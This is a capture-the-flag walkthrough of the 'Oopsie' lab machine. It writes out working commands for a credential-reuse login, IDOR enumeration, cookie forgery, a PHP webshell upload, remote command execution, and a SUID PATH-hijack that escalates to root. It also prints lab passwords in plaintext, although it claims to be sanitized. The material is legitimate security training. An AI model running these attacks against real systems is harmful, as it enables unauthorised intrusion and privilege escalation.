Oopsie

Technical Walkthrough

Oopsie - Walkthrough

Box Info

• IP: <TARGET>
• OS: Ubuntu 18.04 Linux
• Difficulty: Easy (Starting Point)
• Solved: 2026-05-05

Enumeration

Nmap Scan

nmap -sC -sV -oN nmap/initial <TARGET>

Results: Ports 22 (SSH OpenSSH 7.6p1) and 80 (Apache 2.4.29) open.

Full port scan confirmed no additional ports.

Web Enumeration

The main page is a "Welcome" page for MegaCorp Automotive. Inspecting the page source and checking known paths revealed a login panel at /cdn-cgi/login/.

Foothold

Step 1: Login with Reused Credentials

The Archetype box (previous Starting Point machine) exposed credentials admin:MEGACORP_4dm1n!!. These work on the Oopsie login page.

curl -s -D - -X POST http://<TARGET>/cdn-cgi/login/index.php \
  -d 'username=admin&password: <redacted>'

Response sets cookies: user=34322; role=admin and redirects to /cdn-cgi/login/admin.php.

Step 2: IDOR - Find Super Admin Access ID

The admin panel has an Accounts page at /cdn-cgi/login/admin.php?content=accounts&id=X. Iterating the id parameter reveals all users:

# id=30 reveals super admin
curl -s -b "user=34322;role=admin" \
  "http://<TARGET>/cdn-cgi/login/admin.php?content=accounts&id=30"

Result: super admin has Access ID 86575.

Step 3: Upload PHP Webshell

The Uploads page requires super admin access. Setting cookies to user=86575;role=super admin enables the upload form:

# Create webshell
echo '<?php echo shell_exec($_GET["cmd"]); ?>' > cmd.php

# Upload with super admin cookies
curl -s -b "user=86575;role=super admin" \
  -F "name=cmd" -F "fileToUpload=@cmd.php;type=image/png" \
  "http://<TARGET>/cdn-cgi/login/admin.php?content=uploads&action=upload"

File uploaded to /uploads/cmd.php.

Step 4: RCE and User Flag

curl -s "http://<TARGET>/uploads/cmd.php?cmd=id"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

curl -s "http://<TARGET>/uploads/cmd.php?cmd=cat+/home/robert/user.txt"
# <hash redacted>

Privilege Escalation

Step 5: Find Credentials in Web Config

curl -s "http://<TARGET>/uploads/cmd.php?cmd=cat+/var/www/html/cdn-cgi/login/db.php"
# <?php $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage'); ?>

Step 6: SSH as Robert

ssh robert@<TARGET>  # password: <redacted>
# robert is in group: bugtracker

Step 7: Exploit SUID bugtracker Binary

find / -p<redacted> -4000 -type f 2>/dev/null | grep bugtracker
# /usr/bin/bugtracker (owned by root, SUID, group-executable by bugtracker)

strings /usr/bin/bugtracker
# Key finding: "cat /root/reports/" - calls cat without full path via system()

PATH hijack exploit:

echo '#!/bin/bash' > /tmp/cat
echo '/bin/cat /root/root.txt' >> /tmp/cat
chmod +x /tmp/cat
PATH=/tmp:$PATH /usr/bin/bugtracker
# Enter bug ID: 1
# Output: <hash redacted>

Flags

Lessons Learned

1. Credential Reuse: The admin password from Archetype (MEGACORP_4dm1n!!) worked here. Always test found creds on new boxes.
2. IDOR: Sequential ID enumeration on the accounts page exposed all users including super admin.
3. Cookie-based Access Control: The application trusts client-side cookies (user ID and role) for authorization decisions.
4. SUID PATH Hijack: When a SUID binary calls system("cat ...") with a relative binary name, hijack PATH to execute arbitrary code as root.
5. DB Config Files: Always check web application config files for additional credentials.

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

• Target: <TARGET>
• Name: Oopsie
• OS: Linux (Ubuntu 18.04)
• Difficulty: Easy (Starting Point)
• Attacker (Pwnbox VPN): <TARGET>
• Pwnbox SSH: x08@<TARGET>
• Start Time: 2026-05-05
• Solve Time: ~10 minutes

Services

Credentials Found

Users & Access IDs (IDOR)

Attack Chain

1. Login to /cdn-cgi/login/ with admin:MEGACORP_4dm1n!! (credential reuse from Archetype)
2. IDOR on accounts page (id parameter) - found super admin Access ID: 86575
3. Set cookies user=86575;role=super admin to access upload functionality
4. Upload PHP webshell via file upload
5. RCE as www-data, read user.txt from /home/robert/
6. Found robert's DB password in db.php, SSH'd in as robert
7. bugtracker SUID binary calls cat without full path via system()
8. PATH hijack: create /tmp/cat that reads /root/root.txt, prepend /tmp to PATH
9. Run bugtracker -> root flag

Flags

• user.txt: <hash redacted>
• root.txt: <hash redacted>

Key Lessons

• Credential reuse across HTB Starting Point boxes (Archetype -> Oopsie)
• IDOR via sequential id parameter enumeration
• Cookie-based access control (user ID + role cookies)
• PATH hijack on SUID binaries calling system() with relative commands